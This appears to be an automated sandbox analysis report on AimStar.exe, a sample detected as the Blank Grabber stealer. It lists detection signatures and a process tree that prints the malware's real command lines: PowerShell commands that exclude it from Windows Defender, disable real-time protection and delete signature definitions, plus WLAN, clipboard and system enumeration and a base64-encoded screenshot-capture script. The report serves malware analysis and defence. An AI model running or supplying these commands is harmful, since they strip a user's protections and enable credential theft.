Edit tour

Windows Analysis Report
AimStar.exe

Overview

General Information

Sample name:	AimStar.exe
Analysis ID:	1583098
MD5:	9e5a9429bc193ee14ebc1f87201be518
SHA1:	0e3626c6fa7bd68417244bbbb310173e67c42401
SHA256:	85f1d6c7ae21dd89e2421559fd8192ad9d885529eb684786aeda8abc273870bc
Tags:	BlankGrabberexeuser-aachum
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Writes or reads registry keys via WMI

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (STR)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

AimStar.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\AimStar.exe" MD5: 9E5A9429BC193EE14EBC1F87201BE518)

AimStar.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\AimStar.exe" MD5: 9E5A9429BC193EE14EBC1F87201BE518)

cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7524 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7400 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7552 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 7852 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 7420 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7628 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7488 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7636 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7840 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7892 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7976 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7996 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8056 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8168 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 6528 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 5440 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6660 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 1436 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7320 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 1220 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7312 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 1860 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7576 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7892 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7640 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7888 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7764 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 7748 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7440 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7444 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 4404 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 7660 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1C05.tmp" "c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 8028 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7392 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

SIHClient.exe (PID: 7840 cmdline: C:\Windows\System32\sihclient.exe /cv QZj+5JUF0k+XXwZK8rpr7Q.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)

cmd.exe (PID: 7944 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 7496 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 7596 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8052 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7452 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 5748 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8044 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

